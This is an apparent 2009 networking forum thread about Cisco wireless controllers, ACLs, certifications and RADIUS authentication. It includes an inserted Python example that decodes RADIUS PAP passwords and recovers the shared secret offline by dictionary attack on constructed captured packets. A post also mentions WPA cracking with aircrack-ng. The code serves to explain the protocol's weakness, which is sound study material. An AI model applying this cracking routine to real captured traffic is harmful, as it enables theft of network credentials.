|
CrazyLittle posted:This scares me. Such are the risks of running end of life gear.
|
# ? Feb 17, 2009 13:33 |
|
I'm working on building a "guest" WLAN. The WLAN has its own subnet and associated VLAN. Would you all suggest building the ACLs on the controller or on our core switch?
|
# ? Feb 17, 2009 17:46 |
|
Best practice says to avoid ACLs in the Core. But I think wireless is the exception. However depending on your controller, if it will let you do ACLs on it, then go for it.
|
# ? Feb 17, 2009 18:00 |
|
InferiorWang posted:I'm working on building a "guest" WLAN. The WLAN has it's own subnet and associated VLAN. Would you all suggest building the ACLs on the controller or on our core switch? Well, I assume you're using Cisco LWAPP gear- are you talking about the pre-authentication ACL, or the post-authentication ACL? The WLCs have the ability to provide for both. We're currently going through a similar exercise, and we've decided to impose the preauthentication ACL on the controller, because that's where it makes the most sense, really, and then provide for production filtering via our normal production access control appliances (Nokias). Once you land your guest traffic onto a wired VLAN, I would suggest treating it as you would any normal wired VLAN, and apply your access control wherever you would normally.
|
# ? Feb 17, 2009 18:16 |
|
Speaking of controllers, at what point does one make sense and where do you put it? We will have, after this month, a total of 53 1130AGs in the field all on multiple VLANs with at least 2 SSIDs. Can a controller even handle that many APs?
|
# ? Feb 17, 2009 18:20 |
|
Syano posted:Speaking of controllers, at what point does one make sense and where do you put it? Physically? I have ours racked in the same rack as our 4507R core. It's linked up to a gig port on the core. Yes, a controller can handle that many APs, but you have to make sure you get one that will support that many. Our 4400 supports up to 25 with multiple SSIDs and all that. jwh posted:Well, I assume you're using Cisco LWAPP gear- are you talking about the pre-authentication ACL, or the post-authentication ACL? The WLCs have the ability to provide for both. Post authentication...I think. I'm thinking a simple WEP key for the guest wlan and an ACL that will only let the clients get outbound to ports 80/443/53 for simple web browsing. When we have auditors or presenters, many want internet access and I thought a locked down VLAN would be the best bet. The WEP is merely in place to stop any accidental connections since a couple of our buildings are within close distance to residential areas.
|
# ? Feb 17, 2009 19:04 |
|
InferiorWang posted:Post authentication...I think. I'm thinking a simple WEP key for the guest wlan and an ACL that will only let the clients get outbound to ports 80/443/53 for simple web browsing. When we have auditors or presenters, many want internet access and I thought a locked down VLAN would be the best bet. The WEP is merely in place to stop any accidental connections since a couple of our buildings are within close distance to residential areas. At least run WPA.
|
# ? Feb 17, 2009 19:18 |
|
routenull0 posted:At least run WPA. Good call. WPA2 is a no go because it seems that some versions of Windows will not support that. Most have plain WPA support.
|
# ? Feb 17, 2009 19:21 |
|
I believe the latest builds of aircrack-ng have WPA crack built in now, but worst case, you'll just be giving away free internet.
|
# ? Feb 17, 2009 19:25 |
|
InferiorWang posted:Post authentication...I think. I'm thinking a simple WEP key for the guest wlan and an ACL that will only let the clients get outbound to ports 80/443/53 for simple web browsing. When we have auditors or presenters, many want internet access and I thought a locked down VLAN would be the best bet. The WEP is merely in place to stop any accidental connections since a couple of our buildings are within close distance to residential areas. I'd build your access control where it's easiest for you to administer. That might be the controller, or it might not. Have you enabled the guest vlan feature on the controller for this SSID? You can configure a couple of different authentication databases- I've tested local, and we're working up radius to ACS this week or next. Basically, when a client associates to the SSID, the preauthentication ACL is in play, and when the client tries to web browse to somewhere, the controller will intercept and present the portal login. Provided the client authenticates successfully, the preauthentication acl comes down. This, in combination with blocking client-to-client communication on that SSID (it's a checkbox somewhere in the ssid configuration) seems to work pretty well. You can also dynamically land users into the appropriate VLAN, based on tunnel-private-group-id attributes in RADIUS, but I haven't tested whether that works in conjunction with the Guest VLAN feature of the WLCs. That's a nice feature though, because you can present a single SSID, and the WLC will drop users into the appropriate wired-side VLAN based on returned attributes. Syano posted:Speaking of controllers, at what point does one make sense and where do you put it? Probably the biggest reason to migrate to lightweight is for the simplified radio management, but lightweight is a very different beast, and it may not be very comfortable- especially at first.
If you really want to get your feet wet with lightweight, you can get a 2106 for about $1800, and it'll handle six lightweight APs (which could include some of your 1131AGs). For your radio count, though, you're going to need to look at a 4400.
|
# ? Feb 17, 2009 19:43 |
|
jwh posted:I'd build your access control where it's easiest for you to administer. That might be the controller, or it might not. We have few instances where we actually need guest access, but enough to make my life easier if I come up with a straight forward way to authorize certain people using some sort of basic authentication. I'm mucking around with web authentication using a 'local net user' I entered into the WLC's web tool. I have a couple of questions if you have a spare moment:
- If I use web authentication and just have a generic local net user, I'm assuming then that I don't need to put encryption on the GUEST wireless lan as it won't let me do anything outside of DNS lookups before I authenticate via the web? If that's the case, I'm not understanding what the preauthentication ACL would be used for then. If the user can't do anything after associating with a WLAN but before web authentication, then why would you need the preauthentication ACL?
- From then, I really want to set the ACL at the interface I created? That would be considered post-authentication at that point.
- Is what I'm proposing any different than creating a WLAN with the "Guest LAN" option checked?
Thanks
|
# ? Feb 17, 2009 22:02 |
|
InferiorWang posted:- If I use web authentication and just have a generic local net user, I'm assuming then that I don't need to put encryption on the GUEST wireless lan as it won't let me do anything outside of DNS lookups before I authenticate via the web? Well, whether you encrypt the SSID or not is up to you- you could probably make the argument either way. I'm of the mind that the only encryption worth having is WPA2, and when it comes to guest user access, that's just another thing that is going to cause trouble by not working correctly. But that's just me, and none of our guest wireless architecture has been approved by my IT security group (yet). So you don't need to encrypt that SSID, but you could. My lab SSID is actually WEP+Webauth currently, just because I wanted to broadcast the SSID, but I didn't want people joining it by accident. InferiorWang posted:If that's the case, I'm not understanding what the preauthentication ACL would be used for then. If the user can't do anything after associating with a WLAN but before web authentication, then why would you need the preauthentication ACL? InferiorWang posted:- From then, I really want to set the ACL at the interface I created? That would be consider post-authentication at that point. InferiorWang posted:- Is what I'm proposing any different than creating a WLAN with the "Guest LAN" option checked?
|
# ? Feb 17, 2009 22:44 |
|
jwh posted:My lab SSID is actually WEP+Webauth currently, just because I wanted to broadcast the SSID, but I didn't want people joining it by accident. That is one of my aims as well. quote:Well, that's what depends- as near as I can tell, if you're doing an external portal, you need to craft the preauth acl to allow that traffic to make it to that destination, otherwise the WLC will stomp it. I've never tested an external authentication portal though, and have no idea how it works. I guess you could craft a preauthentication ACL to also allow for some traffic unauthenticated, if you wanted. To answer your question, however, you don't "need it". The WLC onboard portal works fine without specifying a preauthentication ACL. That makes sense. I'm sticking with the onboard portal. quote:Right, if you go into your WLC, under Controller -> Interfaces, you'll have the option of applying an ACL to an interface. You need to build the ACL first in Security -> Access Control Lists -> Access Control Lists. Whether or not you want to manage your ACL on the controller is up to you. Personally, I think the way the WLCs craft ACLs is kind of wonky, but if you don't need a lot of ACLs, it could work for you. The other WLANs, all one other thus far anyway, are considered trusted so I'll rely on switch level access lists for those. The guest wlan is a bit of an oddball so I'm going to try and leave the ACLs at the controller. Sounds good in my own head anyway. quote:Not really, I guess. The onboard guest portal is pretty nice, so I'd use it if you can. No sense reinventing the wheel, right? There's a guest lan check box when you create a new interface on the controller. I'm still not clear on what that option does. The doc I read didn't make it entirely clear. Guess I have to do some more digging.
|
# ? Feb 18, 2009 00:15 |
|
Anyone else excited about the Richards Zeta acquisition and EnergyWise? Any idea when 12.2(50)SE will be released?
|
# ? Feb 18, 2009 09:09 |
|
jwh posted:Have you seen similar behavior outside the T train? T train is the pain train. Well, it's been a few days and the error message isn't showing up in the logs. It was quite frequent so would have shown up by now. What is somewhat confusing is that there are three of these routers, all with the same hardware build and IOS image. Only 1 is giving the error, and it was the one that got cooked. Oh well, we got our RoI on that sucker. Over 6 years it was only rebooted for new IOS images. Still going to replace all three of the 3660s, maybe snag one for the home study. Thanks for suggesting to zap in another image, I had thought this was all hardware. Cheers
|
# ? Feb 18, 2009 15:03 |
|
Ok so I set up a syslog server today and enabled logging on my core router and started receiving syslogs. Next, I move to one of my remote routers, enable logging, and nada. I dick around with it for about an hour and finally have a vendor confirm he can receive syslogs from the device (an 1841 ISR by the way) but I still can't. As is the case a lot of the times, I figure I move on to the next project and let this problem marinate 'til I figure out what's up. Well, my next project is starting to archive configs of these same devices. So I fire up Pumpkin, log in to the same 1841 and try to tftp the config. Again, nada. Session times out with no bytes transferred. Then it hit me, syslog and tftp are both UDP traffic. What in the world could be preventing UDP traffic from coming across this link? For the details it is a point to point T1 with an 1841 at the remote site and an Adtran Netvanta 3200 at the home site. Both routers are pretty darn vanilla with their configs. No fancy ACLs or what not. The remote router has PBR enabled but that is about the only thing out of what I would call the ordinary. Could dhcp relay be redirecting all UDP traffic instead of just dhcp? I know this is not strictly a Cisco question but I hated to start a new thread just for this small issue.
|
# ? Feb 21, 2009 04:02 |
|
Craft an acl to match syslog traffic, and then term mon, followed by debug ip pack xxx detailed where xxx is your acl you created. Make your acl as specific as possible, because routers hate debug ip packet. You'll want to make sure the router is trying to send the syslog data in the first place, and then figure out whether the next device is seeing those packets.
|
# ? Feb 21, 2009 07:12 |
|
jwh posted:Craft an acl to match syslog traffic, and then term mon, followed by debug ip pack xxx detailed where xxx is your acl you created. Make your acl as specific as possible, because routers hate debug ip packet. Excellent. Debugging is something new for me in my journey through the world of Cisco. Looks like I have a project come Monday morning
|
# ? Feb 21, 2009 15:31 |
|
Got a few questions for you guys. Until last week I had no experience with Cisco MARS. My boss expressed to me that several clients of ours had interest in MARS consulting, so I decided to check it out to see if it was something we should or could do. A contact of mine set me up with a MARS appliance on loan for a little while so I spent the weekend getting it up and running and getting acquainted with the CLI and GUI. I have experience using and administering HP Openview in a decently sized service provider environment so the concept of NMS isn't foreign. I haven't had time to do much beyond interfacing it with one router and configuring it for user access but over the next few days I will spend a lot more time working with it. I'm reading all of the Cisco-provided material (user guide, config guide, startup guide, etc) as well as the two Cisco Press books on MARS and it all seems pretty straight forward. Does anyone have any experience administering MARS in a working environment? I'm curious to know any tips and tricks that have been found, or potential pitfalls that could be avoided. Also, anyone got a cheap ASA 5505 (or any cheap ASA at all) for sale or know where I can get one? Paul Boz_ fucked around with this message at 05:27 on Feb 23, 2009 |
# ? Feb 23, 2009 05:22 |
|
Paul Boz_ posted:I have experience using and administering HP Openview in a decently sized service provider environment so the concept of NMS isn't foreign. I've looked at MARS several times, and we've also looked at Q1, and CheckPoint's offering. I think they're all terribly expensive for what you get, and none of them solve the problem of having to hire an additional full time employee just to babysit the installation. Paul Boz_ posted:Also, anyone got a cheap ASA 5505 (or any cheap ASA at all) for sale or know where I can get one?
|
# ? Feb 23, 2009 17:31 |
|
Stupid question: How difficult would it be for someone with a good deal of functional network knowledge but absolutely no hands-on cisco experience to gun for a CCNP cert? I have a lab with 2800s, 6509s, and ASAs. Background: I am a soon-to-be-unemployed IT security architect currently looking for a job in a location where there is very little for me, but a ton of net eng jobs. I can talk about advanced network architecture and routing concepts all day, but have never been the guy to actually set it up or troubleshoot it. About all I know about cisco commands is that include is grep. Is it ridiculous for me to think that I can pick up a CCNP cert in a month or so?
|
# ? Feb 23, 2009 17:48 |
|
Wizard of Yendor posted:Stupid question: How difficult would it be for someone with a good deal of functional network knowledge but absolutely no hands-on cisco experience to gun for a CCNP cert? I have a lab with 2800s, 6509s, and ASAs. If you feel you have the knowledge, just sit a 14-day bootcamp with tests included. They teach you what's on the test, not what should be "known" to a CCNP. You will need to get CCNA first though. You can take the tests for CCNP but will not be granted certificate and title until CCNA has been accomplished.
|
# ? Feb 23, 2009 17:51 |
|
Keep in mind that CCNA is a prerequisite for CCNP, so you need to pass that first. I'd say that CCNP in one month is all but impossible with little to no prior knowledge. Edit: Oh yea, bootcamp.
|
# ? Feb 23, 2009 17:51 |
|
Yeah I realize that I have to pass the CCNA. From talking to my colleagues that will be trivial though. I have found bootcamps to be a waste of time in the past (CISSP), compared to book/practice exam cramming, is there not good published material for CCNP self-paced study?
|
# ? Feb 23, 2009 18:48 |
|
Wizard of Yendor posted:Yeah I realize that I have to pass the CCNA. From talking to my colleagues that will be trivial though. http://www.amazon.com/CCNP-Official-Exam-Certification-Library/dp/158720178X/ref=pd_bbs_sr_1?ie=UTF8&s=books&qid=1235136550&sr=8-1
|
# ? Feb 23, 2009 19:56 |
|
I took the composite followed by the ISCW and ONT within six or seven months. Without hands on experience you cannot get a CCNP in a month without cheating. There are tons of sims on each of the exams that sometimes ask you to do more archaic stuff than you are prepared for. The CCIP exams were especially like that. Take it test by test and see where you are. jwh posted:I was under the impression MARS isn't really a NMS in the way that OpenView is- MARS is geared more towards security event correlation. Definitely right about MARS compared to Openview. That's why I'm messing with MARS before I say I know it As far as ASA prices: I'm trying to find something on the used market that I can use in my lab, nothing commercial grade.
|
# ? Feb 23, 2009 23:48 |
|
Paul Boz_ posted:The CCIP exams were especially like that. How were the BGP and MPLS tests anyway?
|
# ? Feb 24, 2009 00:04 |
|
I have a bunch of equipment I'd like to stop having to micro-manage login and passwords on. I ended up finding some walkthroughs online getting it to work with the Microsoft IAS (Radius) implementation in my test environment. Unfortunately I can't get this to work with any setting besides PAP which is unencrypted. The bosses won't stand for that even if it is on a secured network. Is there something else I should be looking into? I was originally going to setup a VM with FreeRadius but the IAS stuff looked pretty straightforward, especially on the DC. Even though it's not Cisco oriented, anyone have any recommendations on a Radius for Dumbasses book/tutorial? There's nothing on Safari that I see and it's a pretty big huge mindfuck to find a place to start comprehending it.
|
# ? Feb 25, 2009 00:43 |
|
Haydez posted:I have a bunch of equipment I'd like to stop having to micro-manage login and passwords on. I ended up finding some walkthroughs online getting it to work with the Microsoft IAS (Radius) implementation in my test environment. Unfortunately I can't get this to work with any setting besides PAP which is unencrypted. The bosses wont stand for that even if it is on a secured network. Do you need to do this through RADIUS/IAS? If possible have you looked into using TACACS+? (using tac_plus from shrubbery.net) In either case the traffic is 'encrypted' with a shared secret between the client and server, so the only way to recover the password off the wire is to brute force or know that shared secret.
|
# ? Feb 25, 2009 04:40 |
|
Haydez posted:I have a bunch of equipment I'd like to stop having to micro-manage login and passwords on. I ended up finding some walkthroughs online getting it to work with the Microsoft IAS (Radius) implementation in my test environment. Unfortunately I can't get this to work with any setting besides PAP which is unencrypted. The bosses wont stand for that even if it is on a secured network. Did you try to sniff that PAP login? The secret keys you use are to make an md5 hash of the credentials. Granted it's not aes256 encryption, but if this is on private lans I wouldn't (and don't) worry about it. quote:The RADIUS protocol does not transmit passwords in cleartext between the NAS and RADIUS server (not even with PAP protocol). Rather, a shared secret is used along with the MD5 hashing algorithm to obfuscate passwords. Because MD5 is not considered to be a very strong protection of the user's credentials, additional protection - such as IPsec tunnels - should be used to further encrypt the RADIUS traffic. The user's credentials are the only part protected by RADIUS itself, but other user-specific attributes passed by RADIUS may be considered sensitive or private information as well. Please refer to the references for more details on this subject. http://en.wikipedia.org/wiki/RADIUS I use IAS for nas and network authentication, looks great in audits because they are used to a windows format. Tac_plus is great for accounting info. E: Anyone ever experience auth-proxy timers not working when you set them to over 8 hours? Cheers Herv fucked around with this message at 10:48 on Feb 25, 2009 |
# ? Feb 25, 2009 10:37 |
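The two replies above both lean on the same fact: RADIUS does not send a PAP password in the clear, it XORs it against MD5(shared secret + Request Authenticator) per RFC 2865 section 5.2, so whoever knows the shared secret can read every password, and the secret itself can be guessed offline because the Response Authenticator on the Access-Accept is just MD5 over known packet fields plus the secret. The following Python is an added example, not code from the thread or from IAS/tac_plus; the secret, password, Request Authenticator and the single Service-Type attribute in the "captured" Access-Accept are all constructed for the demo.

```python
"""
RFC 2865 User-Password obfuscation and why the shared secret is the
only thing protecting a PAP login on the wire.  Added example; all
packet fields, secrets and passwords below are constructed.
"""
import hashlib
import struct


def encode_user_password(password: bytes, secret: bytes, request_auth: bytes) -> bytes:
    """RFC 2865 5.2: pad the password with NULs to a multiple of 16 octets,
    then XOR each 16-byte block with MD5(secret + previous block).  The
    first block uses the Request Authenticator as the "previous block"."""
    if len(password) > 128:
        raise ValueError("User-Password is limited to 128 octets")
    padded = password + b"\x00" * ((-len(password)) % 16)
    if not padded:                      # empty password still sends one block
        padded = bytes(16)
    out, prev = b"", request_auth
    for i in range(0, len(padded), 16):
        keystream = hashlib.md5(secret + prev).digest()
        block = bytes(p ^ k for p, k in zip(padded[i:i + 16], keystream))
        out += block
        prev = block                    # chaining: next key depends on this ciphertext
    return out


def decode_user_password(cipher: bytes, secret: bytes, request_auth: bytes) -> bytes:
    """Inverse of encode_user_password.  Anyone holding the secret and the
    Access-Request (which carries the Request Authenticator) gets the
    password back.  Trailing NUL padding is stripped."""
    out, prev = b"", request_auth
    for i in range(0, len(cipher), 16):
        keystream = hashlib.md5(secret + prev).digest()
        out += bytes(c ^ k for c, k in zip(cipher[i:i + 16], keystream))
        prev = cipher[i:i + 16]
    return out.rstrip(b"\x00")


def response_authenticator(code: int, ident: int, attrs: bytes,
                           request_auth: bytes, secret: bytes) -> bytes:
    """RFC 2865 section 3: ResponseAuth = MD5(Code+ID+Length+RequestAuth+Attributes+Secret).
    Every field except the secret is visible in the captured request/response pair."""
    header = struct.pack("!BBH", code, ident, 20 + len(attrs))
    return hashlib.md5(header + request_auth + attrs + secret).digest()


def recover_secret(wordlist, code, ident, attrs, request_auth, observed_resp_auth):
    """Offline dictionary attack: the Response Authenticator is a free oracle
    for secret guesses, no further traffic to the server needed."""
    for guess in wordlist:
        if response_authenticator(code, ident, attrs, request_auth, guess) == observed_resp_auth:
            return guess
    return None


def demo(request_auth: bytes = bytes(range(16))):
    """Constructed capture: a NAS sends PAP credentials under a weak secret,
    the server answers Access-Accept (code 2) with Service-Type=Administrative-User."""
    secret = b"cisco123"                # weak shared secret (constructed)
    password = b"Sup3rS3cret"           # user's password (constructed)
    ident = 0x2a
    captured_user_password = encode_user_password(password, secret, request_auth)
    accept_attrs = struct.pack("!BBI", 6, 6, 6)   # Service-Type(6), len 6, Administrative-User(6)
    captured_resp_auth = response_authenticator(2, ident, accept_attrs, request_auth, secret)

    wordlist = [b"secret", b"radius", b"cisco", b"cisco123", b"changeme"]
    found = recover_secret(wordlist, 2, ident, accept_attrs, request_auth, captured_resp_auth)
    recovered_pw = decode_user_password(captured_user_password, found, request_auth) if found else None
    return {"recovered_secret": found, "recovered_password": recovered_pw}


if __name__ == "__main__":
    print(demo())
```

The takeaway for the IAS-versus-TACACS+ question: both obfuscate with MD5 keyed by the shared secret, so the practical controls are a long random secret per NAS, RADIUS traffic confined to a management VLAN or IPsec tunnel, and not treating "not cleartext" as "encrypted" in front of the boss.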
|
routenull0 posted:How were the BGP and MPLS tests anyway? I recall the BGP test had some really exotic MED questions. Somehow I scored over 900 though.
|
# ? Feb 25, 2009 11:44 |
|
I started another thread and got pointed here. gwon posted:I've just been told that I'm going offshore in a couple of weeks to install a WAAS box to help with the connection out there. Any tips?
|
# ? Feb 25, 2009 13:18 |
|
We have an opening for a Senior Network Administrator in Southwest Florida. Here is the link: http://www.21stcenturyoncology.com/jobs_nondr.asp quote:
Cisco experience is HUGE for this.
|
# ? Feb 25, 2009 16:50 |
|
routenull0 posted:How were the BGP and MPLS tests anyway? I actually took the composite. It was the worst exam I have taken, by far, at least in terms of difficulty. The SIM questions were using 12.0 IOS so a lot of the commands I tried to use either did not work at all or were not supported. I suppose it was more like the CCIE than any other exams I have taken - you had to know multiple ways to do the same thing, almost to the point of obscurity. Conversely, the CCNA Security was a joke. 4 or 5 SDM questions, everything else multiple choice, under 60 questions. My only problem with that exam was the number of blurry and almost unreadable simlet questions. I had to leave comments on at least three of them. That and my workstation locked up so I had to be moved to a new desk. I found out that the timer doesn't stop when that happens.
|
# ? Feb 25, 2009 17:02 |
|
gwon posted:I started another thread and got pointed here I'm afraid I don't have much advice, but we looked at WAAS code back when it was in beta. It seemed to require a lot more configuration than we had anticipated, and we ended up dropping the evaluation simply because we didn't have the resources internally to work it. I also remember a number of caveats with both dscp preservation and printing, as weird as that sounds. I'm sure (hope) those issues are resolved now. However, Gartner says be careful: http://www.networkworld.com/community/node/33153 BoNNo530 posted:We have an opening for a Senior Network Administrator in Southwest Florida. Here is the link:
|
# ? Feb 25, 2009 18:24 |
|
ragzilla posted:Do you need to do this through RADIUS/IAS? If possible have you looked into using TACACS+? (using tac_plus from shrubbery.net) Herv posted:Did you try to sniff that PAP login? I know about the shared secret part. Unfortunately the boss sees the word unencrypted and that sets off his alarm instantly. I'll check out the TACACS+. If the IAS setup is the better option I'll have to slug it out with the boss. The upper management are overly paranoid about everything to the point that sending out hyperlinks in e-mails is heavily discouraged.
|
# ? Feb 25, 2009 21:05 |
|
Not Cisco but this isn't worth its own thread. Anyone have any experience with the Foundry Netiron MLX series? We're looking to replace our 6509s with an MLX-4. It would be doing everything for our data center network. It looks like Foundry had some issues with their older stuff and BGP did they get that all worked out?
|
# ? Feb 26, 2009 01:13 |
|
gwon posted:I started another thread and got pointed here Not sure if you are talking WAAS appliance or one of the other variants. I'd start with the design guide: http://www.cisco.com/en/US/products/ps6474/products_implementation_design_guides_list.html I know how it works for the most part but haven't had the chance to mess with it much. Sorry .
|
# ? Feb 26, 2009 02:10 |
|
FatCow posted:Not Cisco but this isn't worth its own thread. After the issues one of our customers had on their RX-16 (granted, some were of their own creation- did you know Foundry will build custom code for you if your application breaks/is broken by their code?), I'm glad we stuck to Cisco. Why are you looking to get rid of the 6509s?
|
# ? Feb 26, 2009 05:04 |
|
FatCow posted:It looks like Foundry had some issues with their older stuff and BGP did they get that all worked out? For what it's worth, I was troubleshooting Foundry BGP bugs as of this past June. That said, I didn't have visibility into the code on the NetIron, because I was troubleshooting this from a customer perspective. Yeah. I would say keep your 6509, but then again, you don't say why you're considering getting rid of it.
|
# ? Feb 26, 2009 16:51 |